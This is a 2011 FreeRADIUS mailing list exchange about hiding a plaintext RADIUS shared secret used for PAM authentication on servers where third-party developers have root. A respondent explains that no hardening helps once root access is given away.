Hiding "secret" used in for PAM authentication

Gregory Machin gregory.machin at gmail.com
Sun Nov 20 22:34:03 CET 2011


Firstly these are not my servers, or my department. My roll is limited
to provisioning the radius server. I did suggest restricted access
sudo etc and that didn't fly. I was asked what the implications of the
shared secret being visible are, and if there is a way to obfuscate
it.

I will forward on this commentary to the relevant persons and leave it
with them.

Thanks
G

On Sun, Nov 20, 2011 at 4:35 AM, John Dennis <jdennis at redhat.com> wrote:
> On 11/18/2011 07:33 PM, Gregory Machin wrote:
>>
>> Hi.
>> We are using using PAM to authenticate users against Freeradius, an
>> that is working well. The problem is that the users are 3rd party
>> developers and some need root access. The issue we have is that the
>> radius secret is stored in clear text file. How can this be hidden so
>> that is can be misused  ?
>>
>> Is there a document on hardening Freeradius ?
>
> Giving 3rd party users root access to servers with sensitive information is
> dumb. Nothing is protected once you have root. You need to seriously
> reconsider why anybody except a trusted small group of admins need root.
>
> I can't seriously believe you're asking a question about hardening after
> declaring you intend to give root away. The very first rule of hardening is
> to restrict root access, all hardening efforts are a complete waste of time
> once root is compromised.
>
>
> --
> John Dennis <jdennis at redhat.com>
>
> Looking to carve out IT costs?
> www.redhat.com/carveoutcosts/
>




More information about the Freeradius-Users mailing list